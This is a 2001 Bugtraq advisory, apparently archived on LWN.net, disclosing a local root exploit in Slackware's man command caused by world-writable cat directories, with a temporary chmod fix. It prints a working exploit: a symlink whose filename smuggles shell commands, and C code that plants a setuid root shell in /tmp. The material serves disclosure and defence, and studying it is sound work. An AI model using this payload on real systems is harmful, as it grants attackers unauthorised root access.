[LWN Logo]
[LWN.net]
From:	 <josh@pulltheplug.com>
To:	 <bugtraq@securityfocus.com>
Subject: Slackware /usr/bin/man vulnerability
Date:	 Tue, 17 Jul 2001 08:34:48 -0500 (EST)

The following advisory was sent to slackware July 11th, 2001, they failed
to respond so I hope the temporary patch will make do:

Submitted by  : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net)
                zen-parse (zen-parse@gmx.net)
Vulnerability : /usr/bin/man
Tested On     : Slackware 8.0 and before.
Local         : Yes
Remote        : No
Temporary Fix : chmod 700 /var/man/cat*
Target        : root or any other user that uses man
Greets to     : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
                slider, cryptix, s0ttle, xphantom, qtip, Sultrix, Defiance,
                Insane, rusko, falcon-networks.com.
See also      : http://www.securityfocus.com/vdb/?id=2815



	Slackware 8.0 and previous issues of Slackware are released with
/var/man/cat*/ chmod 1777:

drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/

Since these directories are world writeable we can create symlinks there
like so:

`ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.
;script;man.7"
/var/man/cat7/man.7.gz`

When `/usr/bin/man man` is executed by root, it will create
/var/man/cat7/man.1.gz.  The symlink forces it to create a file in
/usr/man/man7 named:
"/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.;
script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>

int main()
{
  FILE *fil;
  mode_t perm = 06711;

  if(!getuid()) {
    fil = fopen("/tmp/bleh.c","w");
    fprintf(fil,"%s\n","#include <unistd.h>");
    fprintf(fil,"%s\n","#include <stdio.h>");
    fprintf(fil,"%s\n","int main() {");
    fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);");
    fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);");
    fprintf(fil,"%s\n","return 0; }");
    fclose(fil);
    system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
    unlink("/tmp/bleh.c");
    chmod("/tmp/bleh", perm);
  }
   execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
   return 0;
}

With the above code compiled in /tmp/script, if root were to run `man man`, a
suid shell would be left in /tmp/bleh.